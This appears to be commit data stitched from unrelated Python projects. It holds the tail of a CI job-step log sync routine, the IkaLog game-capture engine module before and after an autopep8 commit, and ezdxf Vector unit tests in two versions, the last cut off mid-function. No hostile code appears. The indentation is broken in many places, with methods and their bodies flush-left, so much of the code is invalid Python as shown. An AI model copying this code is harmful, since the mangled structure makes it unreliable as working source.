                        result = self._sync_log(
                            jobstep=downstream_jobstep,
                            name=downstream_jobstep.label,
                            job_name=downstream_job_name,
                            build_no=build_no,
                        )
                except Exception:
                    db.session.rollback()
                    current_app.logger.exception(
                        'Unable to sync console log for job step %r',
                        downstream_jobstep.id.hex)
                db.session.commit()
            if jobsteps:
                # update phase statistics
                jobphase.date_started = safe_agg(
                    min, (s.date_started for s in jobsteps), default=job.date_started)
                jobphase.date_finished = safe_agg(
                    max, (s.date_finished for s in jobsteps), default=job.date_finished)
                # jobphase.duration = (jobphase.date_finished - jobphase.date_started).total_seconds()
            else:
                jobphase.date_started = job.date_started
                jobphase.date_finished = job.date_finished
            db.session.add(jobphase)
            db.session.commit()
        manager = TestResultManager(job)
        with db.session.begin_nested():
            manager.save(test_list)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import copy
import cv2
import pprint
import sys
import time
import traceback
from ikalog.utils import *
from . import scenes
# The IkaLog core engine.
#
class IkaEngine:
# Profiling
    def _profile_dump_scenes(self):
        # Print cumulative processing time per scene.
        for scene in self.scenes:
            print('%4.3fs %s' % (scene._prof_time_took, scene))
    def _profile_dump(self):
        # Dump all collected profiling data.
        self._profile_dump_scenes()
    def enable_profile(self):
        self._enable_profile = True
    def disble_profile(self):
        # NOTE(review): method name is a typo ("disble"); kept unchanged
        # because external callers may rely on it.
        self._enable_profile = False
# Exception Logging
    def _exception_log_init(self, context):
        # Reset the per-session exception log to an empty mapping.
        context['engine']['exceptions_log'] = {}
    def _exception_log_dump(self, context):
        # Pretty-print collected exceptions, if any were recorded.
        if not 'exceptions_log' in context['engine']:
            self._exception_log_init(context)
        if len(context['engine']['exceptions_log']) > 0:
            pprint.pprint(context['engine']['exceptions_log'])
def _exception_log_append(self, context, name, text):
if not 'exceptions_log' in context['engine']:
self._exception_log_init(context)
d = context['engine']['exceptions_log']
count = d.get(name, {'count': 0})['count']
d[name] = {
'count': count + 1,
'text': text,
}
#
    def on_game_individual_result(self, context):
        # Result screen seen: close the session in 20s unless renewed.
        self.session_close_wdt = context['engine']['msec'] + (20 * 1000)
    def on_result_gears(self, context):
        # Gear screen follows the result; shorten the watchdog to 1s.
        if self.session_close_wdt is not None:
            self.session_close_wdt = context['engine']['msec'] + (1 * 1000)
    def on_game_lost_sync(self, context):
        self.session_abort()
    def dprint(self, text):
        # Debug print to stderr so stdout stays clean for plugins.
        print(text, file=sys.stderr)
    def call_plugins(self, event_name, params=None, debug=False):
        """Invoke `event_name` on every output plugin that implements it.

        Plugins lacking the hook fall back to onUncatchedEvent if present.
        Exceptions from plugins are printed to stderr and swallowed so one
        bad plugin cannot stop the engine.
        """
        if debug:
            self.dprint('call plug-in hook (%s):' % event_name)
        for op in self.output_plugins:
            if hasattr(op, event_name):
                if debug:
                    self.dprint('Call %s' % op.__class__.__name__)
                try:
                    if params is None:
                        getattr(op, event_name)(self.context)
                    else:
                        getattr(op, event_name)(self.context, params)
                except:
                    self.dprint('%s.%s() raised a exception >>>>' %
                                (op.__class__.__name__, event_name))
                    self.dprint(traceback.format_exc())
                    self.dprint('<<<<<')
            elif hasattr(op, 'onUncatchedEvent'):
                if debug:
                    self.dprint(
                        'call plug-in hook (UncatchedEvent, %s):' % event_name)
                try:
                    getattr(op, 'onUncatchedEvent')(event_name, self.context)
                except:
                    self.dprint('%s.%s() raised a exception >>>>' %
                                (op.__class__.__name__, event_name))
                    self.dprint(traceback.format_exc())
                    self.dprint('<<<<<')
    def call_plugins_later(self, event_name, params=None, debug=False):
        # Queue the event; it is dispatched at the end of process_frame().
        # NOTE(review): `debug` is accepted but unused here.
        self._event_queue.append((event_name, params))
    def read_next_frame(self, skip_frames=0):
        """Read a frame from the capture source, optionally skipping some.

        Retries once per second while the source returns None; returns
        (None, None) if stop() was requested meanwhile.  Updates
        engine msec/frame/preview in the context.
        """
        for i in range(skip_frames):
            frame = self.capture.read_frame()
        frame = self.capture.read_frame()
        while frame is None:
            self.call_plugins('on_frame_read_failed')
            if self._stop:
                return None, None
            cv2.waitKey(1000)
            frame = self.capture.read_frame()
        t = self.capture.get_current_timestamp()
        self.context['engine']['msec'] = t
        self.context['engine']['frame'] = frame
        # Deep copy so plugins can draw on the preview without touching
        # the frame the scenes will analyze.
        self.context['engine']['preview'] = copy.deepcopy(frame)
        self.call_plugins('on_debug_read_next_frame')
        return frame, t
    def stop(self):
        # Notify plugins, then flag the main loop to exit.
        self.call_plugins('on_stop')
        self._stop = True
    def reset(self):
        """Reset per-game state in the context and notify plugins."""
        # Initalize the context
        self.context['game'] = {
            'map': None,
            'rule': None,
            'won': None,
            'players': None,
            'kills': 0,
            'dead': False,
            'death_reasons': {},
            'inkling_state': [None, None],
            # Float values of start and end times scince the epoch in second.
            # They are used with IkaUtils.GetTime.
            'start_time': None,
            'end_time': None,
            # Int values of start and end offset times in millisecond.
            # They are used with context['engine']['msec']
            'start_offset_msec': None,
            'end_offset_msec': None,
        }
        self.call_plugins('on_game_reset')
        self._exception_log_init(self.context)
def create_context(self):
self.context = {
'engine': {
'engine': self,
'epoch_time': None,
'frame': None,
'service': {
'call_plugins': self.call_plugins,
'call_plugins_later': self.call_plugins,
# For backward compatibility
'callPlugins': self.call_plugins,
},
'exceptions_log': {
},
},
'scenes': {
},
'config': {
},
'lobby': {
}
}
self.reset()
self.session_close_wdt = None
    def session_close(self):
        """Finalize the current game session and reset for the next one."""
        self.session_close_wdt = None
        if not self.context['game']['end_time']:
            # end_time should be initialized in GameFinish.
            # This is a fallback in case GameFinish was skipped.
            self.context['game']['end_time'] = IkaUtils.getTime(self.context)
            self.context['game']['end_offset_msec'] = self.context['engine']['msec']
        self.call_plugins('on_game_session_end')
        self.reset()
    def session_abort(self):
        """Abort the current game session (e.g. lost sync) and reset."""
        self.session_close_wdt = None
        if not self.context['game']['end_time']:
            # end_time should be initialized in GameFinish or session_close.
            # This is a fallback in case they were skipped.
            self.context['game']['end_time'] = IkaUtils.getTime(self.context)
            self.context['game']['end_offset_msec'] = self.context['engine'].get('msec', None)
        self.call_plugins('on_game_session_abort')
        self.reset()
    def process_scene(self, scene):
        """Feed the current frame to one scene; log (or re-raise) errors."""
        context = self.context
        try:
            scene.new_frame(context)
            scene.match(context)
        except:
            if self._abort_at_scene_exception:
                raise
            scene_name = scene.__class__.__name__
            desc = traceback.format_exc()
            self.dprint('%s raised a exception >>>>' % scene_name)
            self.dprint(desc)
            self.dprint('<<<<<')
            self._exception_log_append(context, scene_name, desc)
def find_scene_object(self, scene_class_name):
for scene in self.scenes:
if scene.__class__.__name__ == scene_class_name:
return scene
return None
    def process_frame(self):
        """Run one engine iteration: read a frame, match scenes, dispatch.

        Returns False when no frame could be read (stop requested);
        otherwise falls off the end and returns None.
        """
        context = self.context
        frame, t = self.read_next_frame()
        if frame is None:
            return False
        context['engine']['inGame'] = self.find_scene_object(
            'GameTimerIcon').match(context)
        self.call_plugins('on_frame_read')
        for scene in self.scenes:
            self.process_scene(scene)
        # Session watchdog: close the session once its deadline passed.
        if self.session_close_wdt is not None:
            if self.session_close_wdt < context['engine']['msec']:
                self.dprint('Watchdog fired. Closing current session')
                self.session_close()
        key = None
        self.call_plugins('on_draw_preview')
        self.call_plugins('on_show_preview')
        # FixMe: Since on_frame_next and on_key_press has non-standard arguments,
        # self.call_plugins() doesn't work for those.
        for op in self.output_plugins:
            if hasattr(op, "on_frame_next"):
                try:
                    key = op.on_frame_next(context)
                except:
                    pass
        for op in self.output_plugins:
            if hasattr(op, "on_key_press"):
                try:
                    op.on_key_press(context, key)
                except:
                    pass
        # Dispatch events queued via call_plugins_later during this frame.
        while len(self._event_queue) > 0:
            event = self._event_queue.pop(0)
            self.call_plugins(event_name=event[0], params=event[1])
    def _main_loop(self):
        """Pump process_frame() until stopped; EOF ends (or closes) the session."""
        while not self._stop:
            if self._pause:
                time.sleep(0.5)
                continue
            try:
                self.process_frame()
            except EOFError:
                # EOF. Close session if close_session_at_eof is set.
                if self.close_session_at_eof:
                    if self.session_close_wdt is not None:
                        self.dprint('Closing current session at EOF')
                        self.session_close()
                    else:
                        self.session_abort()
                self._stop = True
        cv2.destroyAllWindows()
    def run(self):
        """Run the main loop; on exit dump profiling and exception logs."""
        try:
            self._main_loop()
        finally:
            if self._enable_profile:
                self._profile_dump()
            # NOTE(review): 'if 1' looks like a debugging leftover; kept.
            if 1:
                self._exception_log_dump(self.context)
    def set_capture(self, capture):
        # Attach the frame source; record its class name for plugins.
        self.capture = capture
        self.context['engine']['input_class'] = self.capture.__class__.__name__
    def set_epoch_time(self, epoch_time):
        self.context['engine']['epoch_time'] = epoch_time
    def set_plugins(self, plugins):
        # Dispatch order: the engine itself, then scenes, then user plugins.
        self.output_plugins = [self]
        self.output_plugins.extend(self.scenes)
        self.output_plugins.extend(plugins)
    def pause(self, pause):
        self._pause = pause
    def _initialize_scenes(self):
        # Scenes are matched in this order on every frame (process_frame).
        self.scenes = [
            scenes.GameTimerIcon(self),
            scenes.GameStart(self),
            scenes.GameGoSign(self),
            scenes.GameKill(self),
            scenes.GameDead(self),
            scenes.GameOutOfBound(self),
            scenes.GameFinish(self),
            scenes.GameSpecialGauge(self),
            scenes.GameSpecialWeapon(self),
            scenes.GameRankedBattleEvents(self),
            scenes.PaintScoreTracker(self),
            scenes.ObjectiveTracker(self),
            scenes.SplatzoneTracker(self),
            scenes.InklingsTracker(self),
            scenes.ResultJudge(self),
            scenes.ResultDetail(self),
            scenes.ResultUdemae(self),
            scenes.ResultGears(self),
            scenes.ResultFesta(self),
            scenes.Lobby(self),
            # scenes.Downie(self),
            scenes.Blank(self),
        ]
    def __init__(self, enable_profile=False, abort_at_scene_exception=False):
        self._initialize_scenes()
        self.output_plugins = [self]
        self.last_capture = time.time() - 100
        self._stop = False
        # Engine starts paused; call pause(False) to begin processing.
        self._pause = True
        self._event_queue = []
        self.close_session_at_eof = False
        self._enable_profile = enable_profile
        self._abort_at_scene_exception = abort_at_scene_exception
        self.create_context()
ikalog/engine: autopep8 and so on.
- Applied autopep8
- In some functions, assign context (reference to self.context)
- Define context["engine"]["msec"] at create_context(), so it can no longer be an undefined reference.
Signed-off-by: Takeshi HASEGAWA <80595b5c49522665976d35e515d02ac963124d00@gmail.com>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import copy
import cv2
import pprint
import sys
import time
import traceback
from ikalog.utils import *
from . import scenes
# The IkaLog core engine.
#
class IkaEngine:
# Profiling
    def _profile_dump_scenes(self):
        # Print cumulative processing time per scene.
        for scene in self.scenes:
            print('%4.3fs %s' % (scene._prof_time_took, scene))
    def _profile_dump(self):
        # Dump all collected profiling data.
        self._profile_dump_scenes()
    def enable_profile(self):
        self._enable_profile = True
    def disble_profile(self):
        # NOTE(review): method name is a typo ("disble"); kept unchanged
        # because external callers may rely on it.
        self._enable_profile = False
# Exception Logging
    def _exception_log_init(self, context):
        # Reset the per-session exception log to an empty mapping.
        context['engine']['exceptions_log'] = {}
    def _exception_log_dump(self, context):
        # Pretty-print collected exceptions, if any were recorded.
        if not 'exceptions_log' in context['engine']:
            self._exception_log_init(context)
        if len(context['engine']['exceptions_log']) > 0:
            pprint.pprint(context['engine']['exceptions_log'])
    def _exception_log_append(self, context, name, text):
        # Record an exception under `name`: bump its count, keep the
        # latest traceback text.
        if not 'exceptions_log' in context['engine']:
            self._exception_log_init(context)
        d = context['engine']['exceptions_log']
        count = d.get(name, {'count': 0})['count']
        d[name] = {
            'count': count + 1,
            'text': text,
        }
#
    def on_game_individual_result(self, context):
        # Result screen seen: close the session in 20s unless renewed.
        self.session_close_wdt = context['engine']['msec'] + (20 * 1000)
    def on_result_gears(self, context):
        # Gear screen follows the result; shorten the watchdog to 1s.
        if self.session_close_wdt is not None:
            self.session_close_wdt = context['engine']['msec'] + (1 * 1000)
    def on_game_lost_sync(self, context):
        self.session_abort()
    def dprint(self, text):
        # Debug print to stderr so stdout stays clean for plugins.
        print(text, file=sys.stderr)
    def call_plugins(self, event_name, params=None, debug=False):
        """Invoke `event_name` on every output plugin that implements it.

        Plugins lacking the hook fall back to onUncatchedEvent if present.
        Exceptions from plugins are printed to stderr and swallowed so one
        bad plugin cannot stop the engine.
        """
        context = self.context
        if debug:
            self.dprint('call plug-in hook (%s):' % event_name)
        for op in self.output_plugins:
            if hasattr(op, event_name):
                if debug:
                    self.dprint('Call %s' % op.__class__.__name__)
                try:
                    if params is None:
                        getattr(op, event_name)(context)
                    else:
                        getattr(op, event_name)(context, params)
                except:
                    self.dprint('%s.%s() raised a exception >>>>' %
                                (op.__class__.__name__, event_name))
                    self.dprint(traceback.format_exc())
                    self.dprint('<<<<<')
            elif hasattr(op, 'onUncatchedEvent'):
                if debug:
                    self.dprint(
                        'call plug-in hook (UncatchedEvent, %s):' % event_name)
                try:
                    getattr(op, 'onUncatchedEvent')(event_name, context)
                except:
                    self.dprint('%s.%s() raised a exception >>>>' %
                                (op.__class__.__name__, event_name))
                    self.dprint(traceback.format_exc())
                    self.dprint('<<<<<')
    def call_plugins_later(self, event_name, params=None, debug=False):
        # Queue the event; it is dispatched at the end of process_frame().
        # NOTE(review): `debug` is accepted but unused here.
        self._event_queue.append((event_name, params))
    def read_next_frame(self, skip_frames=0):
        """Read a frame from the capture source, optionally skipping some.

        Retries once per second while the source returns None; returns
        (None, None) if stop() was requested meanwhile.  Updates
        engine msec/frame/preview in the context.
        """
        context = self.context
        for i in range(skip_frames):
            frame = self.capture.read_frame()
        frame = self.capture.read_frame()
        while frame is None:
            self.call_plugins('on_frame_read_failed')
            if self._stop:
                return None, None
            cv2.waitKey(1000)
            frame = self.capture.read_frame()
        t = self.capture.get_current_timestamp()
        context['engine']['msec'] = t
        context['engine']['frame'] = frame
        # Deep copy so plugins can draw on the preview without touching
        # the frame the scenes will analyze.
        context['engine']['preview'] = copy.deepcopy(frame)
        self.call_plugins('on_debug_read_next_frame')
        return frame, t
    def stop(self):
        # Notify plugins, then flag the main loop to exit.
        self.call_plugins('on_stop')
        self._stop = True
    def reset(self):
        """Reset per-game state in the context and notify plugins."""
        # Initalize the context
        self.context['game'] = {
            'map': None,
            'rule': None,
            'won': None,
            'players': None,
            'kills': 0,
            'dead': False,
            'death_reasons': {},
            'inkling_state': [None, None],
            # Float values of start and end times scince the epoch in second.
            # They are used with IkaUtils.GetTime.
            'start_time': None,
            'end_time': None,
            # Int values of start and end offset times in millisecond.
            # They are used with context['engine']['msec']
            'start_offset_msec': None,
            'end_offset_msec': None,
        }
        self.call_plugins('on_game_reset')
        self._exception_log_init(self.context)
def create_context(self):
self.context = {
'engine': {
'engine': self,
'epoch_time': None,
'frame': None,
'msec': None,
'service': {
'call_plugins': self.call_plugins,
'call_plugins_later': self.call_plugins,
# For backward compatibility
'callPlugins': self.call_plugins,
},
'exceptions_log': {
},
},
'scenes': {
},
'config': {
},
'lobby': {
}
}
self.reset()
self.session_close_wdt = None
    def session_close(self):
        """Finalize the current game session and reset for the next one."""
        context = self.context
        self.session_close_wdt = None
        if not context['game']['end_time']:
            # end_time should be initialized in GameFinish.
            # This is a fallback in case GameFinish was skipped.
            context['game']['end_time'] = IkaUtils.getTime(context)
            context['game']['end_offset_msec'] = context['engine']['msec']
        self.call_plugins('on_game_session_end')
        self.reset()
def session_abort(self):
    """Abort the current game session and notify plugins."""
    ctx = self.context
    self.session_close_wdt = None
    game = ctx['game']
    if not game['end_time']:
        # end_time should be initialized in GameFinish or session_close.
        # This is a fallback in case they were skipped.
        game['end_time'] = IkaUtils.getTime(ctx)
        game['end_offset_msec'] = ctx['engine']['msec']
    self.call_plugins('on_game_session_abort')
    self.reset()
def process_scene(self, scene):
    """Run one scene detector against the current frame.

    A scene that raises is logged and recorded in the context's exception
    log instead of killing the engine, unless the engine was created with
    abort_at_scene_exception=True.
    """
    context = self.context
    try:
        scene.new_frame(context)
        scene.match(context)
    # Bug fix: this was a bare `except:`, which also swallowed
    # KeyboardInterrupt/SystemExit; only real errors should be trapped.
    except Exception:
        if self._abort_at_scene_exception:
            raise
        scene_name = scene.__class__.__name__
        desc = traceback.format_exc()
        self.dprint('%s raised a exception >>>>' % scene_name)
        self.dprint(desc)
        self.dprint('<<<<<')
        self._exception_log_append(context, scene_name, desc)
def find_scene_object(self, scene_class_name):
    """Return the registered scene whose class name matches, or None."""
    candidates = (s for s in self.scenes
                  if s.__class__.__name__ == scene_class_name)
    return next(candidates, None)
def process_frame(self):
    """Read one frame and run the full per-frame pipeline.

    Returns False when no frame could be read (capture stopped);
    otherwise runs all scenes, fires preview/key events and drains the
    deferred-event queue (implicitly returning None).
    """
    context = self.context
    frame, t = self.read_next_frame()
    if frame is None:
        return False
    # Scene-independent flag: whether a game timer icon is on screen.
    context['engine']['inGame'] = \
        self.find_scene_object('GameTimerIcon').match(context)
    self.call_plugins('on_frame_read')
    for scene in self.scenes:
        self.process_scene(scene)
    # Close the pending session once the watchdog deadline (msec) passes.
    if self.session_close_wdt is not None:
        if self.session_close_wdt < context['engine']['msec']:
            self.dprint('Watchdog fired. Closing current session')
            self.session_close()
    key = None
    self.call_plugins('on_draw_preview')
    self.call_plugins('on_show_preview')
    # FixMe: Since on_frame_next and on_key_press has non-standard arguments,
    # self.call_plugins() doesn't work for those.
    for op in self.output_plugins:
        if hasattr(op, 'on_frame_next'):
            try:
                key = op.on_frame_next(context)
            except:
                pass
    for op in self.output_plugins:
        if hasattr(op, 'on_key_press'):
            try:
                op.on_key_press(context, key)
            except:
                pass
    # Dispatch events queued via call_plugins_later() during this frame.
    while len(self._event_queue) > 0:
        event = self._event_queue.pop(0)
        self.call_plugins(event_name=event[0], params=event[1])
def _main_loop(self):
    """Frame loop: runs until stop() is called or the input hits EOF."""
    while not self._stop:
        if self._pause:
            # Paused: idle without burning CPU.
            time.sleep(0.5)
            continue
        try:
            self.process_frame()
        except EOFError:
            # EOF. Close session if close_session_at_eof is set.
            if self.close_session_at_eof:
                if self.session_close_wdt is not None:
                    # A close was already pending; finish it now.
                    self.dprint('Closing current session at EOF')
                    self.session_close()
                else:
                    self.session_abort()
                self._stop = True
    cv2.destroyAllWindows()
def run(self):
    """Run the main loop; always dump diagnostics on the way out."""
    try:
        self._main_loop()
    finally:
        if self._enable_profile:
            self._profile_dump()
        # Always dump the exception log (was guarded by a leftover debug
        # `if 1:` toggle, which is dead syntax).
        self._exception_log_dump(self.context)
def set_capture(self, capture):
    """Attach the video capture source and record its class name in the context."""
    self.capture = capture
    self.context['engine']['input_class'] = self.capture.__class__.__name__
def set_epoch_time(self, epoch_time):
    """Record the capture's epoch time in the context for plugins to use."""
    self.context['engine']['epoch_time'] = epoch_time
def set_plugins(self, plugins):
    """Register output plugins.

    Order matters: the engine itself first, then every scene, then the
    user-supplied plugins.
    """
    registered = [self]
    registered.extend(self.scenes)
    registered.extend(plugins)
    self.output_plugins = registered
def pause(self, pause):
    """Pause (True) or resume (False) the main loop."""
    self._pause = pause
def _initialize_scenes(self):
    """Instantiate every scene detector, in the order they are matched each frame."""
    self.scenes = [
        scenes.GameTimerIcon(self),
        scenes.GameStart(self),
        scenes.GameGoSign(self),
        scenes.GameKill(self),
        scenes.GameDead(self),
        scenes.GameOutOfBound(self),
        scenes.GameFinish(self),
        scenes.GameSpecialGauge(self),
        scenes.GameSpecialWeapon(self),
        scenes.GameRankedBattleEvents(self),
        scenes.PaintScoreTracker(self),
        scenes.ObjectiveTracker(self),
        scenes.SplatzoneTracker(self),
        scenes.InklingsTracker(self),
        scenes.ResultJudge(self),
        scenes.ResultDetail(self),
        scenes.ResultUdemae(self),
        scenes.ResultGears(self),
        scenes.ResultFesta(self),
        scenes.Lobby(self),
        # scenes.Downie(self),
        scenes.Blank(self),
    ]
def __init__(self, enable_profile=False, abort_at_scene_exception=False):
    """Create the engine.

    Args:
        enable_profile: dump profiling information when run() exits.
        abort_at_scene_exception: re-raise scene exceptions instead of
            logging them (useful when debugging a scene).
    """
    self._initialize_scenes()
    self.output_plugins = [self]
    self.last_capture = time.time() - 100
    self._stop = False
    # The engine starts paused; call pause(False) to begin processing.
    self._pause = True
    self._event_queue = []
    self.close_session_at_eof = False
    self._enable_profile = enable_profile
    self._abort_at_scene_exception = abort_at_scene_exception
    self.create_context()
|
import sys
import pytest
import math
from ezdxf.algebra.vector import Vector, is_close
PY3 = sys.version_info.major > 2
def test_init_no_params():
v = Vector()
assert v == (0, 0, 0)
assert v == Vector()
def test_init_one_param():
    v = Vector((2, 3))
    assert v == (2, 3)  # z is 0.
    v = Vector((2, 3, 4))
    assert v == (2, 3, 4)  # z is taken from the 3-tuple.
def test_init_two_params():
v = Vector(1, 2)
assert v == (1, 2) # z is 0.
v = Vector(5, 6, 7) - Vector(1, 1, 1)
assert v == (4, 5, 6)
v = Vector.from_deg_angle(0)
assert v == (1, 0)
length, angle = 7, 45
v = Vector.from_deg_angle(angle, length)
x = math.cos(math.radians(angle)) * length
y = math.sin(math.radians(angle)) * length
assert v == (x, y)
def test_init_three_params():
v = Vector(1, 2, 3)
assert v == (1, 2, 3)
def test_from_angle():
angle = math.radians(50)
length = 3.
assert Vector.from_rad_angle(angle, length) == (math.cos(angle) * length, math.sin(angle) * length, 0)
def test_vector_as_tuple():
v = Vector(1, 2, 3)
assert v[0] == 1
assert v[1] == 2
assert v[2] == 3
assert tuple(v) == (1, 2, 3)
def test_iter():
assert sum(Vector(1, 2, 3)) == 6
def test_deep_copy():
import copy
v = Vector(1, 2, 3)
l1 = [v, v, v]
l2 = copy.copy(l1)
assert l2[0] is l2[1]
assert l2[1] is l2[2]
assert l2[0] is v
l3 = copy.deepcopy(l1)
assert l3[0] is l3[1]
assert l3[1] is l3[2]
assert l3[0] is not v
def test_get_angle():
v = Vector(3, 3)
assert is_close(v.angle_deg, 45)
assert is_close(v.angle_rad, math.radians(45))
def test_spatial_angle():
v = Vector(3, 3, 0)
assert is_close(v.spatial_angle_deg, 45)
assert is_close(v.spatial_angle_rad, math.radians(45))
def test_compare_vectors():
v1 = Vector(1, 2, 3)
# compare to tuple
assert v1 == (1, 2, 3)
# compare tuple to vector
assert (1, 2, 3) == v1
v2 = Vector(2, 3, 4)
assert v2 > v1
assert v1 < v2
def test_xy():
assert Vector(1, 2, 3).xy == Vector(1, 2)
def test_is_null():
    v = Vector()
    assert v.is_null
    # Two numerically-equivalent constructions; their difference should be
    # null within the vector tolerance (test_bool asserts the same value
    # is falsy, i.e. null).
    v1 = Vector(23.56678, 56678.56778, 2.56677) * (1.0 / 14.5667)
    v2 = Vector(23.56678, 56678.56778, 2.56677) / 14.5667
    result = v2 - v1
    # Bug fix: `result` was computed but never checked.
    assert result.is_null
    assert Vector(0, 0, 0).is_null
@pytest.mark.skipif(not PY3, reason="__bool__ not supported")
def test_bool():
v = Vector()
assert bool(v) is False
v1 = Vector(23.56678, 56678.56778, 2.56677) * (1.0 / 14.5667)
v2 = Vector(23.56678, 56678.56778, 2.56677) / 14.5667
result = v2 - v1
assert bool(result) is False
# actual precision is abs_tol=1e-9
assert not Vector(1e-8, 0, 0).is_null
def test_magnitude():
v = Vector(3, 4, 5)
assert is_close(abs(v), 7.0710678118654755)
assert is_close(v.magnitude, 7.0710678118654755)
def test_magnitude_square():
v = Vector(3, 4, 5)
assert is_close(v.magnitude_square, 50)
def test_normalize():
v = Vector(2, 0, 0)
assert v.normalize() == (1, 0, 0)
def test_normalize_to_length():
v = Vector(2, 0, 0)
assert v.normalize(4) == (4, 0, 0)
def test_orthogonal_ccw():
v = Vector(3, 4)
assert v.orthogonal() == (-4, 3)
def test_orthogonal_cw():
v = Vector(3, 4)
assert v.orthogonal(False) == (4, -3)
def test_negative():
v = Vector(2, 3, 4)
assert -v == (-2, -3, -4)
def test_add_scalar():
v = Vector(2, 3, 4)
assert v + 3 == (5, 6, 7)
def test_iadd_scalar():
v = Vector(2, 3, 4)
v += 3
assert v == (5, 6, 7)
def test_sub_scalar():
v = Vector(2, 3, 4)
assert v - 3 == (-1, 0, 1)
def test_isub_scalar():
v = Vector(2, 3, 4)
v -= 3
assert v == (-1, 0, 1)
def test_add_vector():
v = Vector(2, 3, 4)
assert v + (7, 7, 7) == (9, 10, 11)
def test_iadd_vector():
v = Vector(2, 3, 4)
v += (7, 7, 7)
assert v == (9, 10, 11)
def test_radd_vector():
v = Vector(2, 3, 4)
assert (7, 7, 7) + v == (9, 10, 11)
def test_sub_vector():
v = Vector(2, 3, 4)
assert v - (7, 7, 7) == (-5, -4, -3)
def test_isub_vector():
v = Vector(2, 3, 4)
v -= (7, 7, 7)
assert v == (-5, -4, -3)
def test_rsub_vector():
v = Vector(2, 3, 4)
assert (7, 7, 7) - v == (5, 4, 3)
def test_mul_scalar():
v = Vector(2, 3, 4)
assert v * 2 == (4, 6, 8)
def test_imul_scalar():
v = Vector(2, 3, 4)
v *= 2
assert v == (4, 6, 8)
def test_rmul_scalar():
v = Vector(2, 3, 4)
assert 2 * v == (4, 6, 8)
def test_div_scalar():
v = Vector(2, 3, 4)
assert v / 2 == (1, 1.5, 2)
def test_idiv_scalar():
v = Vector(2, 3, 4)
v /= 2
assert v == (1, 1.5, 2)
def test_rdiv_scalar():
v = Vector(2, 3, 4)
assert 2 / v == (1, 0.66666666667, 0.5)
def test_dot_product():
v1 = Vector(2, 7, 1)
v2 = Vector(3, 9, 8)
assert is_close(v1.dot(v2), 77)
def test_angle_deg():
assert is_close(Vector(0, 1).angle_deg, 90)
assert is_close(Vector(0, -1).angle_deg, -90)
assert is_close(Vector(1, 1).angle_deg, 45)
assert is_close(Vector(-1, 1).angle_deg, 135)
def test_angle_between():
v1 = Vector(0, 1)
v2 = Vector(1, 1)
angle = v1.angle_between(v2)
assert is_close(angle, math.pi / 4)
# reverse order, same result
angle = v2.angle_between(v1)
assert is_close(angle, math.pi / 4)
def test_cross_product():
v1 = Vector(2, 7, 9)
v2 = Vector(3, 9, 1)
assert v1.cross(v2) == (-74, 25, -3)
def test_rot_z():
assert Vector(2, 2, 7).rot_z_deg(90) == (-2, 2, 7)
def test_lerp():
v1 = Vector(1, 1, 1)
v2 = Vector(4, 4, 4)
assert v1.lerp(v2, .5) == (2.5, 2.5, 2.5)
assert v1.lerp(v2, 0) == (1, 1, 1)
assert v1.lerp(v2, 1) == (4, 4, 4)
def test_replace():
v = Vector(1, 2, 3)
assert v.replace(x=7) == (7, 2, 3)
assert v.replace(y=7) == (1, 7, 3)
assert v.replace(z=7) == (1, 2, 7)
assert v.replace(x=7, z=7) == (7, 2, 7)
# added Vector tuple tests
import sys
import pytest
import math
from ezdxf.algebra.vector import Vector, is_close
PY3 = sys.version_info.major > 2
def test_init_no_params():
v = Vector()
assert v == (0, 0, 0)
assert v == Vector()
def test_init_one_param():
    v = Vector((2, 3))
    assert v == (2, 3)  # z is 0.
    v = Vector((2, 3, 4))
    assert v == (2, 3, 4)  # z is taken from the 3-tuple.
def test_init_two_params():
v = Vector(1, 2)
assert v == (1, 2) # z is 0.
v = Vector(5, 6, 7) - Vector(1, 1, 1)
assert v == (4, 5, 6)
v = Vector.from_deg_angle(0)
assert v == (1, 0)
length, angle = 7, 45
v = Vector.from_deg_angle(angle, length)
x = math.cos(math.radians(angle)) * length
y = math.sin(math.radians(angle)) * length
assert v == (x, y)
def test_init_three_params():
v = Vector(1, 2, 3)
assert v == (1, 2, 3)
def test_from_angle():
angle = math.radians(50)
length = 3.
assert Vector.from_rad_angle(angle, length) == (math.cos(angle) * length, math.sin(angle) * length, 0)
def test_vector_as_tuple():
v = Vector(1, 2, 3)
assert v[0] == 1
assert v[1] == 2
assert v[2] == 3
assert tuple(v) == (1, 2, 3)
assert isinstance(v[:2], tuple)
assert v[:2] == (1, 2)
assert v[1:] == (2, 3)
assert isinstance(v.xyz, tuple)
assert v.xyz == (1, 2, 3)
def test_iter():
assert sum(Vector(1, 2, 3)) == 6
def test_deep_copy():
import copy
v = Vector(1, 2, 3)
l1 = [v, v, v]
l2 = copy.copy(l1)
assert l2[0] is l2[1]
assert l2[1] is l2[2]
assert l2[0] is v
l3 = copy.deepcopy(l1)
assert l3[0] is l3[1]
assert l3[1] is l3[2]
assert l3[0] is not v
def test_get_angle():
v = Vector(3, 3)
assert is_close(v.angle_deg, 45)
assert is_close(v.angle_rad, math.radians(45))
def test_spatial_angle():
v = Vector(3, 3, 0)
assert is_close(v.spatial_angle_deg, 45)
assert is_close(v.spatial_angle_rad, math.radians(45))
def test_compare_vectors():
v1 = Vector(1, 2, 3)
# compare to tuple
assert v1 == (1, 2, 3)
# compare tuple to vector
assert (1, 2, 3) == v1
v2 = Vector(2, 3, 4)
assert v2 > v1
assert v1 < v2
def test_xy():
assert Vector(1, 2, 3).xy == Vector(1, 2)
def test_is_null():
    v = Vector()
    assert v.is_null
    # Two numerically-equivalent constructions; their difference should be
